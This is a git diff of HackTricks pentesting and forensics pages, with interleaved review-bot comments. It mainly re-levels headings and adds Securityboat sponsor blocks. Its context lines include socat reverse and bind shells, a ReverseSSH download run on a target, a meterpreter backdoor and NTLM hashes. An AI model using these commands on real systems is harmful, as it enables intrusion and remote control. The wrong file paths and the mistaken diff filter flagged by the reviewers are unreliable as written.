@@ -312,7 +318,7 @@ This is important as **attackers** some times may copy `/bin/bash` inside `/bin/ Note that you can also **take a look to this information reading the logs**. -## Application Traces +### Application Traces * **SSH**: Connections to systems made using SSH to and from a compromised system result in entries being made in files for each user account (_**∼/.ssh/authorized\_keys**_ and _**∼/.ssh/known\_keys**_). These entries can reveal the hostname or IP address of the remote hosts. * **Gnome Desktop**: User accounts may have a _**∼/.recently-used.xbel**_ file that contains information about files that were recently accessed using applications running in the Gnome desktop. @@ -321,20 +327,20 @@ Note that you can also **take a look to this information reading the logs**. * **MySQL**: User accounts may have a _**∼/.mysql\_history**_ file that contains queries executed using MySQL. * **Less**: User accounts may have a _**∼/.lesshst**_ file that contains details about the use of less, including search string history and shell commands executed via less -## USB Logs +### USB Logs [**usbrip**](https://github.com/snovvcrash/usbrip) is a small piece of software written in pure Python 3 which parses Linux log files (`/var/log/syslog*` or `/var/log/messages*` depending on the distro) for constructing USB event history tables. It is interesting to **know all the USBs that have been used** and it will be more useful if you have an authorized list of USB to find "violation events" (the use of USBs that aren't inside that list). -## Installation +### Installation ``` pip3 install usbrip usbrip ids download #Downloal USB ID database ``` -## Examples +### Examples ``` usbrip events history #Get USB history of your curent linux machine 
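Review bot: in the `@@ -312,7 +318,7 @@` hunk, the SSH bullet under the re-levelled `### Application Traces` heading names `~/.ssh/known_keys`, which is not a file OpenSSH writes; the per-user record of remote hosts is `~/.ssh/known_hosts`. Worth fixing in this pass, since an examiner searching for the path as written will find nothing and may conclude there were no outbound SSH connections.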
@@ -346,13 +352,13 @@ usbrip ids search --pid 0002 --vid 0e0f #Search for pid AND vid More examples and info inside the github: [https://github.com/snovvcrash/usbrip](https://github.com/snovvcrash/usbrip) -# Review User Accounts and Logon Activities +## Review User Accounts and Logon Activities Examine the _**/etc/passwd**_, _**/etc/shadow**_ and **security logs** for unusual names or accounts created and/or used in close proximity to known unauthorized events. Also check possible sudo brute-force attacks.\ Moreover, check files like _**/etc/sudoers**_ and _**/etc/groups**_ for unexpected privileges given to users.\ Finally look for accounts with **no passwords** or **easily guessed** passwords. -# Examine File System +## Examine File System File system data structures can provide substantial amounts of **information** related to a **malware** incident, including the **timing** of events and the actual **content** of **malware**.\ **Malware** is increasingly being designed to **thwart file system analysis**. Some malware alter date-time stamps on malicious files to make it more difficult to find them with time line analysis. Other malicious code is designed to only store certain information in memory to minimize the amount of data stored in the file system.\ 
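Review bot: the context paragraph under the re-levelled `## Review User Accounts and Logon Activities` heading tells the reader to check `/etc/groups`, but the group database on Linux is `/etc/group`. Suggest correcting the path here so the check for unexpected group memberships points at a file that exists.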
@@ -375,27 +381,27 @@ You can check the inodes of the files inside a folder using `ls -lai /bin |sort Note that an **attacker** can **modify** the **time** to make **files appear** **legitimate**, but he **cannot** modify the **inode**. If you find that a **file** indicates that it was created and modify at the **same time** of the rest of the files in the same folder, but the **inode** is **unexpectedly bigger**, then the **timestamps of that file were modified**. {% endhint %} -# Compare files of different filesystem versions +## Compare files of different filesystem versions -### Find added files +#### Find added files ```bash git diff --no-index --diff-filter=A _openwrt1.extracted/squashfs-root/ _openwrt2.extracted/squashfs-root/ ``` -### Find Modified content +#### Find Modified content ```bash git diff --no-index --diff-filter=M _openwrt1.extracted/squashfs-root/ _openwrt2.extracted/squashfs-root/ | grep -E "^\+" | grep -v "Installed-Time" ``` -### Find deleted files +#### Find deleted files ```bash git diff --no-index --diff-filter=A _openwrt1.extracted/squashfs-root/ _openwrt2.extracted/squashfs-root/ ``` -### Other filters +#### Other filters **`-diff-filter=[(A|C|D|M|R|T|U|X|B)…​[*]]`** 
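Review bot: under the `#### Find deleted files` heading that this hunk re-levels, the command still passes `--diff-filter=A`, which is identical to the "Find added files" command above it and lists additions, not deletions; it should be `--diff-filter=D`. The filter synopsis at the end of the hunk is also written `-diff-filter=` with a single dash, while the option is `--diff-filter`.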
@@ -405,11 +411,17 @@ Also, **these upper-case letters can be downcased to exclude**. E.g. `--diff-fil Note that not all diffs can feature all types. For instance, diffs from the index to the working tree can never have Added entries (because the set of paths included in the diff is limited by what is in the index). Similarly, copied and renamed entries cannot appear if detection for those types is disabled. -# References +## References * [https://cdn.ttgtmedia.com/rms/security/Malware%20Forensics%20Field%20Guide%20for%20Linux%20Systems\_Ch3.pdf](https://cdn.ttgtmedia.com/rms/security/Malware%20Forensics%20Field%20Guide%20for%20Linux%20Systems\_Ch3.pdf) * [https://www.plesk.com/blog/featured/linux-logs-explained/](https://www.plesk.com/blog/featured/linux-logs-explained/) +{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ + +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %}
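Review bot: the sponsor block added after the References list is wrapped in `{% hint style="danger" %}`, which presents an advertisement with the styling of a technical warning; on a forensics procedure page a reader can mistake it for an evidence-handling caveat. Suggest a neutral style such as `info` or a plain embed, and dropping the added line that consists only of `\`. The same block is pasted at the top of this file and again in full-ttys.md and tunneling-and-port-forwarding.md, so a single shared snippet would be easier to maintain than per-page copies.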
@@ -426,5 +438,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
- - diff --git a/generic-methodologies-and-resources/shells/full-ttys.md b/generic-methodologies-and-resources/shells/full-ttys.md index d7d66fbb..2a388d61 100644 --- a/generic-methodologies-and-resources/shells/full-ttys.md +++ b/generic-methodologies-and-resources/shells/full-ttys.md @@ -1,4 +1,4 @@ - +# Full TTYs
@@ -16,8 +16,14 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ -# Full TTY +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %} + +## Full TTY Note that the shell you set in the `SHELL` variable **must** be **listed inside** _**/etc/shells**_ or `The value for the SHELL variable was not found the /etc/shells file This incident has been reported`. Also note that the next snippets only work in bash. If you're in a zsh, change to a bash before obtaining the shell by running `bash`. @@ -39,7 +45,7 @@ socat file:`tty`,raw,echo=0 tcp-listen:4444 socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444 ``` -## **Spawn shells** +### **Spawn shells** * `python -c 'import pty; pty.spawn("/bin/sh")'` * `echo os.system('/bin/bash')` @@ -54,7 +60,7 @@ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444 * vi: `:set shell=/bin/bash:shell` * nmap: `!sh` -# ReverseSSH +## ReverseSSH A convenient way for **interactive shell access**, as well as **file transfers** and **port forwarding**, is dropping the statically-linked ssh server [ReverseSSH](https://github.com/Fahrj/reverse-ssh) onto the target. @@ -69,7 +75,7 @@ wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_revers /dev/shm/reverse-ssh -v -l -p 4444 ``` -* \(2a\) Linux target: +* (2a) Linux target: ```bash # Drop it via your preferred way, e.g. 
@@ -78,7 +84,7 @@ wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_revers /dev/shm/reverse-ssh -p 4444 kali@10.0.0.2 ``` -* \(2b\) Windows 10 target \(for earlier versions, check [project readme](https://github.com/Fahrj/reverse-ssh#features)\): +* (2b) Windows 10 target (for earlier versions, check [project readme](https://github.com/Fahrj/reverse-ssh#features)): ```bash # Drop it via your preferred way, e.g. @@ -97,7 +103,7 @@ ssh -p 8888 127.0.0.1 sftp -P 8888 127.0.0.1 ``` -# No TTY +## No TTY If for some reason you cannot obtain a full TTY you **still can interact with programs** that expects user input. In the following example, the password is passed to `sudo` to read a file: @@ -105,7 +111,12 @@ If for some reason you cannot obtain a full TTY you **still can interact with pr expect -c 'spawn sudo -S cat "/root/root.txt";expect "*password*";send "";send "\r\n";interact' ``` +{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %}
@@ -122,5 +133,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
- - diff --git a/generic-methodologies-and-resources/tunneling-and-port-forwarding.md b/generic-methodologies-and-resources/tunneling-and-port-forwarding.md index 7e338c7f..330f798c 100644 --- a/generic-methodologies-and-resources/tunneling-and-port-forwarding.md +++ b/generic-methodologies-and-resources/tunneling-and-port-forwarding.md @@ -1,4 +1,4 @@ - +# Tunneling and Port Forwarding
@@ -16,18 +16,24 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ -# **SSH** +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %} -SSH graphical connection \(X\) +## **SSH** + +SSH graphical connection (X) ```bash ssh -Y -C @ #-Y is less secure but faster than -X ``` -## Local Port2Port +### Local Port2Port -Open new Port in SSH Server --> Other port +Open new Port in SSH Server --> Other port ```bash ssh -R 0.0.0.0:10521:127.0.0.1:1521 user@10.0.0.1 #Local port 1521 accessible in port 10521 from everywhere @@ -37,9 +43,9 @@ ssh -R 0.0.0.0:10521:127.0.0.1:1521 user@10.0.0.1 #Local port 1521 accessible in ssh -R 0.0.0.0:10521:10.0.0.1:1521 user@10.0.0.1 #Remote port 1521 accessible in port 10521 from everywhere ``` -## Port2Port +### Port2Port -Local port --> Compromised host \(SSH\) --> Third\_box:Port +Local port --> Compromised host (SSH) --> Third\_box:Port ```bash ssh -i ssh_key @ -L :: [-p ] [-N -f] #This way the terminal is still in your host @@ -47,18 +53,18 @@ ssh -i ssh_key @ -L :::631 -N -f -l ``` -## Port2hostnet \(proxychains\) +### Port2hostnet (proxychains) -Local Port --> Compromised host \(SSH\) --> Wherever +Local Port --> Compromised host (SSH) --> Wherever ```bash ssh -f -N -D @ #All sent to local port will exit through the compromised server (use as proxy) ``` -## VPN-Tunnel +### VPN-Tunnel -You need **root in both devices** \(as you are going to create new interfaces\) and the sshd config has to allow root login: -`PermitRootLogin yes` +You need **root in both devices** (as you are going to create new interfaces) and the sshd config has to allow root login:\ +`PermitRootLogin yes`\ `PermitTunnel yes` ```bash 
@@ -76,13 +82,13 @@ iptables -t nat -A POSTROUTING -s 1.1.1.2 -o eth0 -j MASQUERADE Set new route on client side -```text +``` route add -net 10.0.0.0/16 gw 1.1.1.1 ``` -# SSHUTTLE +## SSHUTTLE -You can **tunnel** via **ssh** all the **traffic** to a **subnetwork** through a host. +You can **tunnel** via **ssh** all the **traffic** to a **subnetwork** through a host.\ Example, forwarding all the traffic going to 10.10.10.0/24 ```bash @@ -90,18 +96,18 @@ pip install sshuttle sshuttle -r user@host 10.10.10.10/24 ``` -# Meterpreter +## Meterpreter -## Port2Port +### Port2Port -Local port --> Compromised host \(active session\) --> Third\_box:Port +Local port --> Compromised host (active session) --> Third\_box:Port ```bash # Inside a meterpreter session portfwd add -l -p -r ``` -## Port2hostnet \(proxychains\) +### Port2hostnet (proxychains) ```bash background# meterpreter session @@ -126,22 +132,22 @@ run #Proxy port 1080 by default echo "socks4 127.0.0.1 1080" > /etc/proxychains.conf #Proxychains ``` -# reGeorg +## reGeorg [https://github.com/sensepost/reGeorg](https://github.com/sensepost/reGeorg) -You need to upload a web file tunnel: ashx\|aspx\|js\|jsp\|php\|php\|jsp +You need to upload a web file tunnel: ashx|aspx|js|jsp|php|php|jsp ```bash python reGeorgSocksProxy.py -p 8080 -u http://upload.sensepost.net:8080/tunnel/tunnel.jsp ``` -# Chisel +## Chisel -You can download it from the releases page of [https://github.com/jpillora/chisel](https://github.com/jpillora/chisel) +You can download it from the releases page of [https://github.com/jpillora/chisel](https://github.com/jpillora/chisel)\ You need to use the **same version for client and server** -## socks +### socks ```bash ./chisel server -p 8080 --reverse #Server 
@@ -149,18 +155,18 @@ You need to use the **same version for client and server** #And now you can use proxychains with port 1080 (default) ``` -## Port forwarding +### Port forwarding ```bash ./chisel_1.7.6_linux_amd64 server -p 12312 --reverse ./chisel_1.7.6_linux_amd64 client 10.10.14.20:12312 R:4505:127.0.0.1:4505 ``` -# Rpivot +## Rpivot [https://github.com/klsecservices/rpivot](https://github.com/klsecservices/rpivot) -Reverse tunnel. The tunnel is started from the victim. +Reverse tunnel. The tunnel is started from the victim.\ A socks4 proxy is created on 127.0.0.1:1080 ```bash @@ -181,37 +187,37 @@ victim> python client.py --server-ip --server-port 9999 --ntl victim> python client.py --server-ip --server-port 9999 --ntlm-proxy-ip --ntlm-proxy-port 8080 --domain CONTOSO.COM --username Alice --hashes 9b9850751be2515c8231e5189015bbe6:49ef7638d69a01f26d96ed673bf50c45 ``` -# **Socat** +## **Socat** [https://github.com/andrew-d/static-binaries](https://github.com/andrew-d/static-binaries) -## Bind shell +### Bind shell ```bash victim> socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane attacker> socat FILE:`tty`,raw,echo=0 TCP::1337 ``` -## Reverse shell +### Reverse shell ```bash attacker> socat TCP-LISTEN:1337,reuseaddr FILE:`tty`,raw,echo=0 victim> socat TCP4::1337 EXEC:bash,pty,stderr,setsid,sigint,sane ``` -## Port2Port +### Port2Port ```bash socat TCP-LISTEN:,fork TCP:: & ``` -## Port2Port through socks +### Port2Port through socks ```bash socat TCP-LISTEN:1234,fork SOCKS4A:127.0.0.1:google.com:80,socksport=5678 ``` -## Meterpreter through SSL Socat +### Meterpreter through SSL Socat ```bash #Create meterpreter backdoor to port 3333 and start msfconsole listener in that port 
@@ -231,7 +237,7 @@ OPENSSL,verify=1,cert=client.pem,cafile=server.crt,connect-timeout=5|PROXY:hacke [https://funoverip.net/2011/01/reverse-ssl-backdoor-with-socat-and-metasploit/](https://funoverip.net/2011/01/reverse-ssl-backdoor-with-socat-and-metasploit/) -## SSL Socat Tunnel +### SSL Socat Tunnel **/bin/sh console** @@ -251,9 +257,9 @@ attacker-listener> socat OPENSSL-LISTEN:433,reuseaddr,cert=server.pem,cafile=cli victim> socat STDIO OPENSSL-CONNECT:localhost:433,cert=client.pem,cafile=server.crt ``` -## Remote Port2Port +### Remote Port2Port -Connect the local SSH port \(22\) to the 443 port of the attacker host +Connect the local SSH port (22) to the 443 port of the attacker host ```bash attacker> sudo socat TCP4-LISTEN:443,reuseaddr,fork TCP4-LISTEN:2222,reuseaddr #Redirect port 2222 to port 443 in localhost @@ -261,9 +267,9 @@ victim> while true; do socat TCP4::443 TCP4:127.0.0.1:22 ; done # Esta attacker> ssh localhost -p 2222 -l www-data -i vulnerable #Connects to the ssh of the victim ``` -# Plink.exe +## Plink.exe -It's like a console PuTTY version \( the options are very similar to a ssh client\). +It's like a console PuTTY version ( the options are very similar to a ssh client). As this binary will be executed in the victim and it is a ssh client, we need to open our ssh service and port so we can have a reverse connection. Then, to forward a only locally accessible port to a port in our machine: 
@@ -272,23 +278,23 @@ echo y | plink.exe -l -pw [-p ] -R < echo y | plink.exe -l root -pw password [-p 2222] -R 9090:127.0.0.1:9090 10.11.0.41 #Local port 9090 to out port 9090 ``` -# NTLM proxy bypass +## NTLM proxy bypass -The previously mentioned tool: **Rpivot** +The previously mentioned tool: **Rpivot**\ **OpenVPN** can also bypass it, setting these options in the configuration file: ```bash http-proxy 8080 ntlm ``` -## Cntlm +### Cntlm -[http://cntlm.sourceforge.net/](http://cntlm.sourceforge.net/) +[http://cntlm.sourceforge.net/](http://cntlm.sourceforge.net) -It authenticates against a proxy and binds a port locally that is forwarded to the external service you specify. Then, you can use the tool of your choice through this port. +It authenticates against a proxy and binds a port locally that is forwarded to the external service you specify. Then, you can use the tool of your choice through this port.\ Example that forward port 443 -```text +``` Username Alice Password P@ssw0rd Domain CONTOSO.COM 
@@ -296,22 +302,22 @@ Proxy 10.0.0.10:8080 Tunnel 2222::443 ``` -Now, if you set for example in the victim the **SSH** service to listen in port 443. You can connect to it through the attacker port 2222. +Now, if you set for example in the victim the **SSH** service to listen in port 443. You can connect to it through the attacker port 2222.\ You could also use a **meterpreter** that connects to localhost:443 and the attacker is listening in port 2222. -# YARP +## YARP A reverse proxy create by Microsoft. You can find it here: [https://github.com/microsoft/reverse-proxy](https://github.com/microsoft/reverse-proxy) -# DNS Tunneling +## DNS Tunneling -## Iodine +### Iodine [https://code.kryo.se/iodine/](https://code.kryo.se/iodine/) Root is needed in both systems to create tun adapters and tunnels data between them using DNS queries. -```text +``` attacker> iodined -f -c -P P@ssw0rd 1.1.1.1 tunneldomain.com victim> iodine -f -P P@ssw0rd tunneldomain.com -r #You can see the victim at 1.1.1.2 @@ -319,13 +325,13 @@ victim> iodine -f -P P@ssw0rd tunneldomain.com -r The tunnel will be really slow. You can create a compressed SSH connection through this tunnel by using: -```text +``` ssh @1.1.1.2 -C -c blowfish-cbc,arcfour -o CompressionLevel=9 -D 1080 ``` -## DNSCat2 +### DNSCat2 -Establishes a C&C channel through DNS. It doesn't need root privileges. +Establishes a C\&C channel through DNS. It doesn't need root privileges. ```bash attacker> ruby ./dnscat2.rb tunneldomain.com 
@@ -339,19 +345,19 @@ session -i listen [lhost:]lport rhost:rport #Ex: listen 127.0.0.1:8080 10.0.0.20:80, this bind 8080port in attacker host ``` -### Change proxychains DNS +#### Change proxychains DNS -Proxychains intercepts `gethostbyname` libc call and tunnels tcp DNS request through the socks proxy. By **default** the **DNS** server that proxychains use is **4.2.2.2** \(hardcoded\). To change it, edit the file: _/usr/lib/proxychains3/proxyresolv_ and change the IP. If you are in a **Windows environment** you could set the IP of the **domain controller**. +Proxychains intercepts `gethostbyname` libc call and tunnels tcp DNS request through the socks proxy. By **default** the **DNS** server that proxychains use is **4.2.2.2** (hardcoded). To change it, edit the file: _/usr/lib/proxychains3/proxyresolv_ and change the IP. If you are in a **Windows environment** you could set the IP of the **domain controller**. -# Tunnels in Go +## Tunnels in Go [https://github.com/hotnops/gtunnel](https://github.com/hotnops/gtunnel) -# ICMP Tunneling +## ICMP Tunneling -## Hans +### Hans -[https://github.com/friedrich/hans](https://github.com/friedrich/hans) +[https://github.com/friedrich/hans](https://github.com/friedrich/hans)\ [https://github.com/albertzak/hanstunnel](https://github.com/albertzak/hanstunnel) Root is needed in both systems to create tun adapters and tunnels data between them using ICMP echo requests. 
@@ -362,13 +368,18 @@ Root is needed in both systems to create tun adapters and tunnels data between t ping 1.1.1.100 #After a successful connection, the victim will be in the 1.1.1.100 ``` -# Other tools to check +## Other tools to check * [https://github.com/securesocketfunneling/ssf](https://github.com/securesocketfunneling/ssf) * [https://github.com/z3APA3A/3proxy](https://github.com/z3APA3A/3proxy) * [https://github.com/jpillora/chisel](https://github.com/jpillora/chisel) +{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %}
@@ -385,5 +396,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
- - diff --git a/mobile-pentesting/android-app-pentesting/smali-changes.md b/mobile-pentesting/android-app-pentesting/smali-changes.md index 70016b92..9aaa499a 100644 --- a/mobile-pentesting/android-app-pentesting/smali-changes.md +++ b/mobile-pentesting/android-app-pentesting/smali-changes.md @@ -1,4 +1,4 @@ - +# Smali - Decompiling/\[Modifying]/Compiling
@@ -16,16 +16,24 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ + +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %} + + Sometimes it is interesting to modify the application code to access hidden information for you (maybe well obfuscated passwords or flags). Then, it could be interesting to decompile the apk, modify the code and recompile it. **Opcodes reference:** [http://pallergabor.uw.hu/androidblog/dalvik\_opcodes.html](http://pallergabor.uw.hu/androidblog/dalvik\_opcodes.html) -# Fast Way +## Fast Way Using **Visual Studio Code** and the [APKLab](https://github.com/APKLab/APKLab) extension, you can **automatically decompile**, modify, **recompile**, sign & install the application without executing any command. -# Decompile the APK +## Decompile the APK Using APKTool you can access to the **smali code and resources**: @@ -43,7 +51,7 @@ Some **interesting files you should look are**: If `apktool` has **problems decoding the application** take a look to [https://ibotpeaches.github.io/Apktool/documentation/#framework-files](https://ibotpeaches.github.io/Apktool/documentation/#framework-files) or try using the argument **`-r`** (Do not decode resources). Then, if the problem was in a resource and not in the source code, you won't have the problem (you won't also decompile the resources). -# Change smali code +## Change smali code You can **change** **instructions**, change the **value** of some variables or **add** new instructions. I change the Smali code using [**VS Code**](https://code.visualstudio.com), you then install the **smalise extension** and the editor will tell you if any **instruction is incorrect**.\ Some **examples** can be found here: 
@@ -53,7 +61,7 @@ Some **examples** can be found here: Or you can [**check below some Smali changes explained**](smali-changes.md#modifying-smali). -# Recompile the APK +## Recompile the APK After modifying the code you can **recompile** the code using: @@ -65,7 +73,7 @@ It will **compile** the new APK **inside** the _**dist**_ folder. If **apktool** throws an **error**, try[ installing the **latest version**](https://ibotpeaches.github.io/Apktool/install/) -## **Sing the new APK** +### **Sing the new APK** Then, you need to **generate a key** (you will be asked for a password and for some information that you can fill randomly): @@ -79,7 +87,7 @@ Finally, **sign** the new APK: jarsigner -keystore key.jks path/to/dist/* ``` -## Optimize new application +### Optimize new application **zipalign** is an archive alignment tool that provides important optimisation to Android application (APK) files. [More information here](https://developer.android.com/studio/command-line/zipalign). 
@@ -88,15 +96,15 @@ zipalign [-f] [-v] infile.apk outfile.apk zipalign -v 4 infile.apk ``` -## **Sign the new APK (again?)** +### **Sign the new APK (again?)** -If you **prefer** to use \[**apksigner**]\(**[https://developer.android.com/studio/command-line/apksigner](https://developer.android.com/studio/command-line/apksigner)**)** instead of jarsigner, **you should sing the apk** after applying **the optimization with** zipaling**. BUT NOTICE THAT** YOU ONLY HAVE TO SIGN THE APPLCIATION ONCE** WITH jarsigner (before zipalign) OR WITH aspsigner(after zipaling). +If you **prefer** to use \[**apksigner**]\([**https://developer.android.com/studio/command-line/apksigner**](https://developer.android.com/studio/command-line/apksigner))\*\* instead of jarsigner, **you should sing the apk** after applying **the optimization with** zipaling\*\*. BUT NOTICE THAT\*\* YOU ONLY HAVE TO SIGN THE APPLCIATION ONCE\*\* WITH jarsigner (before zipalign) OR WITH aspsigner(after zipaling). ```bash apksigner sign --ks key.jks ./dist/mycompiled.apk ``` -# Modifying Smali +## Modifying Smali For the following Hello World Java code: @@ -120,9 +128,9 @@ The Smali code would be: The Smali instruction set is available [here](https://source.android.com/devices/tech/dalvik/dalvik-bytecode#instructions). -## Light Changes +### Light Changes -## Modify initial values of a variable inside a function +### Modify initial values of a variable inside a function Some variables are defined at the beginning of the function using the opcode _const_, you can modify its values, or you can define new ones: @@ -134,7 +142,7 @@ const/4 v8, 0x1 const-string v5, "wins" ``` -## Basic Operations +### Basic Operations ``` #Math @@ -159,9 +167,9 @@ if-ne v0, v9, :goto_6 #If not equals, go to: :goto_6 goto :goto_6 #Always go to: :goto_6 ``` -## Bigger Changes +### Bigger Changes -## Logging +### Logging ``` #Log win: 
@@ -180,7 +188,7 @@ Recommendations: * The new variables should be the next numbers of the already declared variables (in this example should be _v10_ and _v11_, remember that it starts in v0). * Change the code of the logging function and use _v10_ and _v11_ instead of _v5_ and _v1_. -## Toasting +### Toasting Remember to add 3 to the number of _.locals_ at the begging of the function. @@ -198,6 +206,12 @@ move-result-object v12 invoke-virtual {v12}, Landroid/widget/Toast;->show()V ``` +{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ + +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %}
@@ -214,5 +228,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
- - diff --git a/network-services-pentesting/113-pentesting-ident.md b/network-services-pentesting/113-pentesting-ident.md index 818d5868..f379a701 100644 --- a/network-services-pentesting/113-pentesting-ident.md +++ b/network-services-pentesting/113-pentesting-ident.md @@ -1,4 +1,4 @@ - +# 113 - Pentesting Ident
@@ -16,10 +16,16 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ -# Basic Information +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %} -Is an [Internet](https://en.wikipedia.org/wiki/Internet) [protocol](https://en.wikipedia.org/wiki/Protocol_\(computing\)) that helps identify the user of a particular [TCP](https://en.wikipedia.org/wiki/Transmission_Control_Protocol) connection. +## Basic Information + +Is an [Internet](https://en.wikipedia.org/wiki/Internet) [protocol](https://en.wikipedia.org/wiki/Protocol\_\(computing\)) that helps identify the user of a particular [TCP](https://en.wikipedia.org/wiki/Transmission\_Control\_Protocol) connection. **Default port:** 113 @@ -28,9 +34,9 @@ PORT STATE SERVICE 113/tcp open ident ``` -# **Enumeration** +## **Enumeration** -## **Manual - Get user/Identify the service** +### **Manual - Get user/Identify the service** If a machine is running the service ident and samba (445) and you are connected to samba using the port 43218. You can get which user is running the samba service by doing: @@ -44,7 +50,7 @@ Other errors: ![](<../.gitbook/assets/image (17).png>) -## Nmap +### Nmap By default (-sC) nmap will identify every user of every running port: @@ -63,7 +69,7 @@ PORT STATE SERVICE VERSION |_auth-owners: root ``` -## Ident-user-enum +### Ident-user-enum Ident-user-enum is a simple PERL script to query the ident service (113/TCP) in order to determine the owner of the process listening on each TCP port of a target system. The list of usernames gathered can be used for password guessing attacks on other network services. It can be installed with `apt install ident-user-enum`. 
@@ -77,15 +83,15 @@ ident-user-enum v1.0 ( http://pentestmonkey.net/tools/ident-user-enum ) 192.168.1.100:445 root ``` -## Shodan +### Shodan * `oident` -# Files +## Files identd.conf -# HackTricks Automatic Commands +## HackTricks Automatic Commands ``` Protocol_Name: Ident #Protocol Abbreviation if there is one. @@ -106,6 +112,12 @@ Entry_2: Note: apt install ident-user-enum ident-user-enum {IP} 22 23 139 445 (try all open ports) ``` +{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ + +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %}
@@ -122,5 +134,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
- - diff --git a/network-services-pentesting/2375-pentesting-docker.md b/network-services-pentesting/2375-pentesting-docker.md index 9dd1ec1c..5bcd6996 100644 --- a/network-services-pentesting/2375-pentesting-docker.md +++ b/network-services-pentesting/2375-pentesting-docker.md @@ -16,6 +16,13 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ + +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %} + ## Docker Basics ### What is @@ -349,6 +356,13 @@ falco-probe found and loaded in dkms You can use auditd to monitor docker. +{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ + +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %} +
Support HackTricks and get benefits! diff --git a/network-services-pentesting/5353-udp-multicast-dns-mdns.md b/network-services-pentesting/5353-udp-multicast-dns-mdns.md index bcfc6773..dcec89a3 100644 --- a/network-services-pentesting/5353-udp-multicast-dns-mdns.md +++ b/network-services-pentesting/5353-udp-multicast-dns-mdns.md @@ -16,6 +16,13 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ + +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %} + ## Basic Information Multicast DNS (mDNS) is a **zero-configuration protocol** that lets you perform **DNS-like operations** on the local network in the absence of a conventional, unicast DNS server. The protocol uses the **same** API, **packet formats**, and operating semantics as DNS, allowing you to resolve domain names on the local network. **DNS Service Discovery (DNS-SD)** is a protocol that allows clients to **discover a list of named instances of services** (such as test.\_ipps.\_tcp.local, or linux.\_ssh.\_tcp.local) in a domain using standard DNS queries. DNS-SD is most often used in conjunction with mDNS but isn’t dependent on it. They’re both used by many IoT devices, such as network printers, Apple TVs, Google Chromecast, Network-Attached Storage (NAS) devices, and cameras.\ @@ -106,6 +113,13 @@ For more information check: * [Practical IoT Hacking: The Definitive Guide to Attacking the Internet of Things](https://books.google.co.uk/books/about/Practical\_IoT\_Hacking.html?id=GbYEEAAAQBAJ\&redir\_esc=y) +{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before 